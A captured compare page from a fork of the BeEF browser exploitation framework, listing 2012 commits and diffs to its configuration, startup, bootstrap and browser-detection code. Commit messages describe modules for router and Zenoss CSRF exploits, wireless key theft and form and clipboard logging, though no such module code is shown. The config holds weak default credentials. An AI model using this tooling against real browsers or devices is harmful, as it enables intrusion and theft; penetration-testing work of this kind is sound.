Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.2
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.3.4
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

129 Commits
beef-0.4.3 ... beef-0.4.3

Author SHA1 Message Date
bcoles
05deaaa8b5 Added Module: ActiveX Command Execution 2012-04-27 14:15:52 +09:30
bcoles
75cf67a6c4 Re-categorized some modules 
Fixed a couple of typos
 2012-04-27 10:35:17 +09:30
bcoles
d3005850d7 Updated supported browser list for several modules 
Added a few hostnames to the DNS Enumeration modules
 2012-04-26 20:07:45 +09:30
bcoles
a8e3d125d4 Added Module: Get Chrome Extensions 
Fixes issue #660
 2012-04-26 19:10:16 +09:30
Wade Alcorn
73bd6ab624 Added boilerplate to files with missing boilerplate 2012-04-24 18:00:15 +10:00
bcoles
923921b92b Added skeleton for custom hooks 
Part of issue #101
 2012-04-23 19:33:19 +09:30
bcoles
fa59e633b0 Popunder window now loads a plain page 2012-04-23 17:36:25 +09:30
bcoles
b5b5f0cd1a Fixed bug in IE version detection 2012-04-23 14:44:03 +09:30
antisnatchor
37c5edf2c2 Added strict doctype for /demos/basic.html page 2012-04-22 13:23:48 +01:00
antisnatchor
6cb8eb68fe Fixed bug on IE9 detection 2012-04-22 13:17:55 +01:00
antisnatchor
9835b0907d Merge branch 'master' of https://github.com/beefproject/beef 2012-04-20 14:47:45 +01:00
antisnatchor
f63240d3cb Added /api/hooks/:session RESTful api call in order to retrieve the full BrowserDetails for the hooked browser. 2012-04-20 14:46:46 +01:00
antisnatchor
5a345abfab Added print_info when unmounting a url (assethandler) 2012-04-20 14:08:08 +01:00
bcoles
a6b338e6c4 Added timeout variable decleration to get_internal_ip module 2012-04-20 22:34:34 +09:30
antisnatchor
217edee831 Added get_internal_ip module (uses an unsigned applet). Fix issue 576 2012-04-20 13:59:58 +01:00
antisnatchor
f8cd395e21 Added additional check on pathname for XssRays Issue 657 2012-04-20 11:40:28 +01:00
antisnatchor
f697e92c95 Decresed default XssRays iframe removal timeout, enhanced comments 2012-04-19 18:10:17 +01:00
antisnatchor
de68a00c75 Fix issue 658: removed content-type response header when replying to a successful founded Ray vector 2012-04-19 18:09:17 +01:00
antisnatchor
cf3587e2b1 Fix issue 657: the damn IE doesn't contain a forward slash on pathname 2012-04-19 18:08:16 +01:00
antisnatchor
d1e23c2084 Updated admin_ui and console extensions code to reflect the move of initialization extension into the core. 2012-04-18 14:37:44 +01:00
antisnatchor
cd4fce7887 Moved initialization extension into the core. BrowserDetails are a vital component of BeEF. There is no reason to don't have it in the core. 2012-04-18 12:54:48 +01:00
antisnatchor
8a3fadb5f8 removed test jenkind line 2012-04-18 12:04:37 +01:00
antisnatchor
6f57d563ea Jenkins test 2012-04-16 18:02:42 +01:00
antisnatchor
66dbf871f1 Added test for test_network_request using the API. 2012-04-15 15:09:26 +01:00
antisnatchor
54e244013b Removed response= variable from test_network_request module response. NOt needed. 2012-04-15 15:08:42 +01:00
antisnatchor
8f05a403ee Added Test_return_ascii_chars Debug module test using the API. 2012-04-15 13:45:24 +01:00
antisnatchor
98807ae9a3 Added RESTful API tests for /api/auth, /api/hooks, /api/modules. Added Test_return_long_string Debug module test using the API :D 2012-04-15 13:22:35 +01:00
antisnatchor
3ebe44732b Added beef.module.key.class to /api/module JSON response. 2012-04-15 12:54:04 +01:00
antisnatchor
8feef887b9 Fixed issue with malformed JSON response (missing }). No using hash.to_json to send response. 2012-04-15 11:56:00 +01:00
antisnatchor
364575592a Moved BeEF credentials from admin_ui extension to the main config.yaml. Updated both admin_ui and RESTful API to reflect the changes. 2012-04-15 10:53:08 +01:00
Christian Frichot
49af6ad443 Merge branch 'RESTenhance' 2012-04-15 16:44:05 +08:00
Christian Frichot
79a7dd3e88 RESTful Admin API Class now includes a LOGIN method 2012-04-15 16:38:38 +08:00
Christian Frichot
321a63b148 Placeholder admin RESTful API class 2012-04-15 07:24:56 +08:00
Christian Frichot
44e9871503 RESTful API now obeys permitted_ui_subnet 2012-04-15 07:24:17 +08:00
bcoles
e52b5101ee Updated logo location 
The favicon is not located at /favicon.ico if web server immitation is enabled
 2012-04-12 17:20:20 +09:30
bcoles
0c0027e06f Event Logger now logs form submissions 
Fixes issue #141
 2012-04-12 12:27:28 +09:30
bcoles
6af55c7e33 Event Logger now logs clipboard events (in IE6 only) 
Fixes issue# 653

Tidied up the 'submit' handler a bit. Part of issue #141
 2012-04-11 14:06:56 +09:30
antisnatchor
2b77416226 Issue 654: the main hook handler now extends the Router class 2012-04-09 12:26:57 +01:00
antisnatchor
dd2e522ce4 Issue 654: the XssRays handler is now extending the Router class 2012-04-09 11:36:35 +01:00
antisnatchor
22772c7822 Issue 654: the RESTful api classes are now extending the Router class 2012-04-09 11:16:21 +01:00
antisnatchor
8cac63a2f0 Issue 654: if /dh handler is called without params, return 404 2012-04-09 11:03:02 +01:00
antisnatchor
c60825faae Issue 654: adjusted DynamicReconstruction handler to extend the Router class 2012-04-09 10:33:23 +01:00
Wade Alcorn
3d80a952ae Version number updated 2012-04-08 16:07:22 +10:00
bcoles
cce8cf451c Added XssRays vectors: 
o URL encoded
	o Double URL encoded
	o Double nibble URL encoded

Fixes issue #65

Part of issue #47
 2012-04-05 14:26:30 +09:30
bcoles
f852b87b2b Added detection for Chrome 18 and 19 2012-04-05 12:45:10 +09:30
Michele Orru
4e1a283736 Merge pull request #656 from tmacuk/master 
Added IIS imitation default root page, thanks to @tmacuk
 2012-04-04 13:33:23 -07:00
Thomas Mackenzie
e168a05936 added pageerror logo for iis imitation 2012-04-04 20:04:31 +01:00
Thomas Mackenzie
e76f301593 added iis imitation construction page 2012-04-04 18:39:56 +01:00
antisnatchor
67d024441d Added Apache/Centos images for the default root page (web server imitation) 2012-04-04 16:45:39 +01:00
antisnatchor
616b969f96 added todo for IIS 6 default root page (web server imitation) 2012-04-04 16:42:42 +01:00
antisnatchor
0067e20702 Changed HTTP response 'server' header to IIS/6 when iis is specified. 2012-04-04 16:41:15 +01:00
antisnatchor
870a182411 Added HTTP response with default Apache centos root page (web server imitation). 2012-04-04 16:33:32 +01:00
antisnatchor
f5a77a63eb Prevent to mount the favicon.ico if we're imitating a web server. 2012-04-04 16:06:19 +01:00
antisnatchor
454280f7de Adjusted errors and default returns for the web server imitation. 2012-04-04 16:05:52 +01:00
antisnatchor
6bebb80f61 Added default 404 HTTP response bodies for Apache 2.2.3 and IIS 6 2012-04-04 15:47:21 +01:00
Keith Lee
e528375e3d Save wireless configuration xml created by Get_wireless_keys module to temp folder 2012-04-02 14:40:32 -04:00
antisnatchor
1db9ccaff6 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-31 14:12:52 +01:00
antisnatchor
2db4885c2f Added comments in the main Router class. 2012-03-31 13:57:18 +01:00
antisnatchor
5474f0507a Allowing also GET method on Access-Control-Allow-Methods (dynamic handler). 2012-03-31 13:27:59 +01:00
antisnatchor
59ac216b71 Added basic web-server imitation (overriding Server response headers, added config.yaml options). 2012-03-31 13:24:30 +01:00
antisnatchor
addc256b8c Remove route "/" from the main router class. Must return 'not found' anyway. 2012-03-29 15:00:20 +02:00
antisnatchor
b88acd98c8 Added BeEF router superclass: it will be extended by other classes when sub-routes are needed. 2012-03-29 14:24:15 +02:00
bcoles
2bca21a41d Minor updates to XSSRays 
Part of issue #47
 2012-03-26 16:29:15 +10:30
bcoles
8518c8fae9 Renamed History Extraction module to Get Visited Domains 
Added 4 links for Firefox
 2012-03-26 14:44:36 +10:30
bcoles
b230b98336 Changed BeEF::API.registered?() to use the :is_matched_params method 
Fixes issue #500
 2012-03-25 14:13:44 +10:30
antisnatchor
e4a7019192 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-24 18:43:57 +01:00
bcoles
45475d625b Updated IE version detection 
No longer modifies the DOM for every call to:
	`isIE8()`
	`isIE9()`
	`isIE()`
 2012-03-22 19:27:36 +10:30
antisnatchor
f0fab1c431 Added rest-client gem dependency when running tests 2012-03-16 11:12:10 +01:00
bcoles
5329d5c147 Added support for Firefox 11 2012-03-16 13:11:20 +10:30
bcoles
e52779e72e Fixed javaEnabled() in BeEF hook 
- It was breaking the hook in IE6

Also fixed a couple of typos in the Local File Theft module description
 2012-03-16 12:40:13 +10:30
antisnatchor
5e2de7d378 reverted http.debug to false 2012-03-15 18:37:53 +01:00
Michele Orru
11fbeb3296 Merge pull request #643 from antisnatchor/master 
RESTful API, from antisnatchor with love :D
 2012-03-15 10:33:17 -07:00
antisnatchor
99fff273fe removed old reference to dynamic_module table 2012-03-15 13:58:37 +01:00
antisnatchor
61efe56b10 Removed classes and requires of dynamic* tables. Not used anymore. 2012-03-15 13:56:48 +01:00
antisnatchor
4e224e63ee added example on how to call metasploit modules with the REST api 2012-03-15 13:53:29 +01:00
antisnatchor
5c96fe2b84 changed return value on override_execute, reformatted code for the metasploit api 2012-03-15 13:32:10 +01:00
Christian Frichot
6541d9fa34 Tidied up some of the Console Shell output handling - Issue #642 2012-03-15 19:52:03 +08:00
Christian Frichot
2bc6a0d8a9 Rick roll module, changed to a different YouTube vid, that appears to work here. Issue #620 2012-03-15 19:43:02 +08:00
Christian Frichot
4f1042a6a3 QRCode extension - minor update to handle the Console in the Core - Issue #641 2012-03-15 19:39:24 +08:00
antisnatchor
8db7ef00b4 Fixed error when attaching to MSF (resetdb? is not there anymore) 2012-03-15 12:25:38 +01:00
antisnatchor
fec922a63c Implemented /api/modules/ to retrieve all enabled modules 2012-03-14 16:52:25 +01:00
antisnatchor
8fdd127f17 Disabled Sinatra exception, and set the custom 404 response to 'not found.' 2012-03-14 16:26:29 +01:00
Graziano Felline
b02bdbaaa7 ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:41:10 +01:00
Graziano Felline
8795c5770a ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:34:46 +01:00
antisnatchor
c3a611d12e Implemented info/options retrieval for a specific module throught the REST API 2012-03-13 17:18:13 +01:00
antisnatchor
434f9f8e43 Now it's possible to launch command modules via the REST api (also with options), and then get execution results. 2012-03-13 12:43:10 +01:00
antisnatchor
837c1f2db8 Modified BeEF::Module.execute to return the command_id of the persisted command, instead of just returning a boolean. Refactored usages in the code as well. 2012-03-13 12:40:28 +01:00
antisnatchor
3674f06609 Implemented /api/logs and /api/logs/hb_session, added code comments 2012-03-12 17:40:38 +01:00
antisnatchor
818f3d207e Retrieving correct browser version with browserDetails BrowserVersion 2012-03-12 17:14:09 +01:00
bcoles
b11502cc84 Added BT Home Hub CSRF module 2012-03-13 00:54:25 +10:30
bcoles
f38c7e5615 Removed "HasJava" from hook initialization 
Updated Get Wireless Keys module description
 2012-03-13 00:50:03 +10:30
bcoles
6ef889b0b1 Removed Java from hook initialization: 
- Removed has_java
	- Removed internal_ip
	- Removed internal_hostname

Added function `beef.browser.javaEnabled()`

Patched function `beef.browser.hasJava()`
	- should no longer break the hook in Chrome/Safari

Added `not_working` browsers to History Extraction module
 2012-03-13 00:19:01 +10:30
antisnatchor
4429ab3df2 Added /api/hooks logic to retrieve online and offline HBs as json 2012-03-12 12:46:04 +01:00
antisnatchor
03cd06a014 Added stubs and registered classes for the 3 main RESTful API endpoints: hooks, modules, logs 2012-03-12 11:55:26 +01:00
antisnatchor
872272645e Added api_token for RESTful api authentication 2012-03-12 10:27:03 +01:00
bcoles
9735a7b66f Merge branch 'master' of https://github.com/beefproject/beef 2012-03-12 11:41:08 +10:30
milo2012
51d6aaa515 Merge remote-tracking branch 'origin/master' 2012-03-12 00:53:07 +08:00
milo2012
5cb1ad3d53 Module for Issue 639 - Retrieving Clear Text Wireless Keys from Compromised Systems 2012-03-12 00:50:02 +08:00
milo2012
daa37293fe Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:57:19 -04:00
root
847b798e0a Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:40:10 -04:00
antisnatchor
7dab21ff7f First skeleton for the RESTful api using Sinatra (modular approach, not classic one). 2012-03-11 16:12:59 +01:00
antisnatchor
e1652bf52e Added sinatra dependency to bundler Gemfile 2012-03-11 10:51:43 +01:00
radoen
a0c11fa695 Added support to intercept dynamic requests 2012-03-11 10:26:56 +01:00
Keith Lee
f2401d3f39 Issue 86 - Working for Firefox. Support for Chrome+Opera+IE still pending. 2012-03-11 10:26:56 +01:00
asaafan
76e881dce9 Delete Skype XSS stub from main branch 2012-03-11 10:26:56 +01:00
unknown
ea199f5c55 Adding stub for Skype XSS module 2012-03-11 10:26:56 +01:00
asaafan
05b7eab56c Delete Skype XSS stub from main branch 2012-03-09 01:46:11 +02:00
bcoles
11870710e8 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-08 20:28:38 +01:00
unknown
dbd6baa7b0 Temporary fix to prevent hook error on Safari. I will implement a final fix tomorrow. 2012-03-07 16:19:06 +01:00
bcoles
c1975691f4 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-07 15:02:12 +10:30
antisnatchor
8c3afcf2b9 Minor changes related to Java detection with the unsigned applet: if the browser is Chrome, we simply rely on window.navigator. 2012-03-06 19:56:58 +01:00
Michele Orru
03604a7e93 Merge pull request #632 from milo2012/master 
Fixes Issue 567: if browser != Chrome, an unsigned java applet is injected in the DOM to verify if Java is really enabled and working.
 2012-03-06 10:44:34 -08:00
Keith Lee
cc9756cf59 Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:46:51 +08:00
Keith Lee
97672966df Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:41:27 +08:00
Saafan
3bd06ebf82 Merge pull request #631 from asaafan/master 
Testing Fork/Merge
 2012-03-05 07:51:04 -08:00
Saafan
c1ad9d7b04 Testing fork/merge 2012-03-05 17:47:14 +02:00
Michele Orru
2796e384b3 Merge pull request #630 from milo2012/master 
changes to command.rb and commands.rb so that that @datastore[cid'] , @datastore['results'] and @datastore['beefhook'] can be called from the modules
 2012-03-05 01:37:19 -08:00
Keith Lee
95f7e92011 Changes to command module and get_physical location so that @datastore['cid'] , @datastore['results'] and @datastore['beefhook'] can be called from the modules 2012-03-05 03:40:46 +08:00
antisnatchor
698e01bb83 reverted back test_contants definition. 2012-03-04 16:36:08 +01:00
antisnatchor
08d50512e9 Added bootstrap unit tests. 2012-03-04 16:22:37 +01:00
antisnatchor
e9a6049e58 Fixes issue 621: Added 2 new command line options. Now it's psosible to specify a different config.yaml file. Also changed the core load order, adding a new bootstrap module. 2012-03-04 14:55:03 +01:00
Wade Alcorn
3f06f6db18 Commented yaml bug fix 2012-03-04 22:12:04 +10:00
Wade Alcorn
487227b945 Version updated 2012-03-04 22:11:21 +10:00
Wade Alcorn
6c7624805c Update delay to test jenkins 2012-03-04 21:46:03 +10:00
bcoles
753299e758 Updated Get Page HTML module: 
o Now returns head and body in one beef.send() request
o Now stores results correctly
 2012-03-04 20:24:04 +10:30
bcoles
0485a1ab7e Added 3x router CSRF exploits: 
o Comtrend CT5367
o Comtrend CT5624
o D-Link DSL500T
 2012-03-04 14:55:00 +10:30
Christian Frichot
52d06e40a2 Removed the dev/null output in the Rake Install task Issue #629 2012-03-03 22:44:05 +08:00
bcoles
5c678a2550 Added cleanup() function to router exploits 
Removed `username:password@` portion of example target URLs as
unfortunately this triggers warnings in most modern browsers. The
modules target CSRF vulnerabilities and it's expected and
acceptable behaviour to rely on the user having an authorized session by
default.

"Advanced users" will be familiar with the `username:password@` trick
and can add it to the URL if they desire.
 2012-03-03 20:43:56 +10:30
Christian Frichot
63805d943d The Console Shell now allows you to drop into an IRB (and then play with the BeEF object if you want) Issue #627 2012-03-03 14:59:59 +08:00
214 changed files with 5131 additions and 958 deletions
Expand all files Collapse all files

1
.gitignore vendored
View File

@@ -1,2 +1,3 @@
beef.db
test/msf-test
custom-config.yaml

3
Gemfile
View File

@@ -25,6 +25,7 @@ else
end
gem "thin"
gem "sinatra", "1.3.2"
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
@@ -48,6 +49,8 @@ if ENV['BEEF_TEST']
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem "capybara"
#RESTful API tests/generic command module tests
gem "rest-client", "~> 1.6.7"
end
source "http://rubygems.org"

52
Gemfile.lock
View File

@@ -1,52 +0,0 @@
GEM
remote: http://rubygems.org/
specs:
addressable (2.2.6)
ansi (1.4.1)
daemons (1.1.5)
data_objects (0.10.7)
addressable (~> 2.1)
dm-core (1.2.0)
addressable (~> 2.2.6)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
do_sqlite3 (0.10.7)
data_objects (= 0.10.7)
erubis (2.7.0)
eventmachine (0.12.10)
json (1.6.4)
librex (0.0.52)
msfrpc-client (1.0.1)
librex (>= 0.0.32)
msgpack (>= 0.4.5)
msgpack (0.4.6)
parseconfig (0.5.2)
rack (1.4.0)
term-ansicolor (1.0.7)
thin (1.3.1)
daemons (>= 1.0.9)
eventmachine (>= 0.12.6)
rack (>= 1.0.0)
PLATFORMS
ruby
DEPENDENCIES
ansi
data_objects
dm-core
dm-migrations
dm-sqlite-adapter
erubis
eventmachine (= 0.12.10)
json
msfrpc-client
parseconfig
term-ansicolor
thin

2
Rakefile
View File

@@ -56,7 +56,7 @@ task :msf => ["install", "msf_install"] do
end
task :install do
sh "export BEEF_TEST=true;bundle install > /dev/null"
sh "export BEEF_TEST=true;bundle install"
end
################################

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.2-alpha
0.4.3.4-alpha

33
beef
View File

@@ -41,15 +41,26 @@ end
# @note Require core loader's
require 'core/loader'
# @note Starts configuration system
config = BeEF::Core::Configuration.instance
# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
else
config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
end
# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
require 'core/bootstrap'
# @note Loads enabled extensions
BeEF::Extensions.load
# @note Prints the BeEF ascii art if the -a flag was passed
if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
BeEF::Core::Console::Banners.print_ascii_art
end
# @note Prints BeEF welcome message
#BeEF::Extension::Console::Banners.print_ascii_art
BeEF::Extension::Console::Banners.print_welcome_msg
BeEF::Core::Console::Banners.print_welcome_msg
# @note Loads enabled modules
BeEF::Modules.load
@@ -75,8 +86,7 @@ case config.get("beef.database.driver")
end
# @note Resets the database if the -x flag was passed
# @todo Change reference from Extension::Console to Core::Console once the console extension is merged with the core
if BeEF::Extension::Console.resetdb?
if BeEF::Core::Console::CommandLine.parse[:resetdb]
print_info 'Resetting the database for BeEF.'
DataMapper.auto_migrate!
else
@@ -94,10 +104,13 @@ http_hook_server = BeEF::Core::Server.instance
http_hook_server.prepare
# @note Prints information back to the user before running the server
BeEF::Extension::Console::Banners.print_loaded_extensions
BeEF::Extension::Console::Banners.print_loaded_modules
BeEF::Extension::Console::Banners.print_network_interfaces_count
BeEF::Extension::Console::Banners.print_network_interfaces_routes
BeEF::Core::Console::Banners.print_loaded_extensions
BeEF::Core::Console::Banners.print_loaded_modules
BeEF::Core::Console::Banners.print_network_interfaces_count
BeEF::Core::Console::Banners.print_network_interfaces_routes
#@note Prints the API key needed to use the RESTful API
print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)

13
config.yaml
View File

@@ -16,14 +16,14 @@
# BeEF Configuration file
beef:
version: '0.4.3.2-alpha'
version: '0.4.3.4-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet = "127.0.0.1/32"
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
@@ -37,6 +37,10 @@ beef:
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
type: "apache" #supported: apache, iis
database:
# For information on using other databases please read the
@@ -55,6 +59,11 @@ beef:
db_passwd: "beef123"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
credentials:
user: "beef"
passwd: "beef"
crypto_default_value_length: 80
# You may override default extension configuration parameters here

3
core/api.rb
View File

@@ -60,10 +60,9 @@ module BeEF
# @param [String] method the method of the class
# @param [Array] params an array of parameters that need to be matched
# @return [Boolean] whether or not the owner is registered
# @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
def registered?(owner, c, method, params = [])
@registry.each{|r|
if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
return true
end
}

55
core/bootstrap.rb Normal file
View File

@@ -0,0 +1,55 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
end
end
## @note Include the BeEF router
require 'core/main/router/router'
require 'core/main/router/api'
## @note Include http server functions for beef
require 'core/main/server'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'
## @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
## @note Include RESTful API
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/api'

22
core/core.rb
View File

@@ -26,10 +26,8 @@ require 'core/main/models/hookedbrowser'
require 'core/main/models/log'
require 'core/main/models/command'
require 'core/main/models/result'
require 'core/main/models/dynamiccommandinfo'
require 'core/main/models/dynamicpayloadinfo'
require 'core/main/models/dynamicpayloads'
require 'core/main/models/optioncache'
require 'core/main/models/browserdetails'
# @note Include the constants
require 'core/main/constants/browsers'
@@ -44,20 +42,8 @@ require 'core/main/crypto'
require 'core/main/logger'
require 'core/main/migration'
# @note Include http server functions for beef
require 'core/main/server'
# @note Include the command line parser and the banner printer
require 'core/main/console/commandline'
require 'core/main/console/banners'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'

9
core/loader.rb
View File

@@ -38,11 +38,4 @@ require 'core/api'
require 'core/settings'
# @note Include the core of BeEF
require 'core/core'
# @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
require 'core/core'

103
core/main/client/browser.js
View File

@@ -48,9 +48,8 @@ beef.browser = {
* Returns true if IE8.
* @example: beef.browser.isIE8()
*/
isIE8: function() {
$j("body").append('<!--[if IE 8]> <div id="beefiecheck" class="ie ie8"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie8'))?true:false;
isIE8: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
@@ -58,8 +57,7 @@ beef.browser = {
* @example: beef.browser.isIE9()
*/
isIE9: function() {
$j("body").append('<!--[if IE 9]> <div id="beefiecheck" class="ie ie9"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie9'))?true:false;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
},
/**
@@ -158,12 +156,28 @@ beef.browser = {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
},
/**
* Returns true if FF11.
* @example: beef.browser.isFF11()
*/
isFF11: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
},
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
*/
isFF12: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
},
/**
@@ -294,12 +308,28 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
},
/**
* Returns true if Chrome 18.
* @example: beef.browser.isC18()
*/
isC18: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
},
/**
* Returns true if Chrome 19.
* @example: beef.browser.isC19()
*/
isC19: function() {
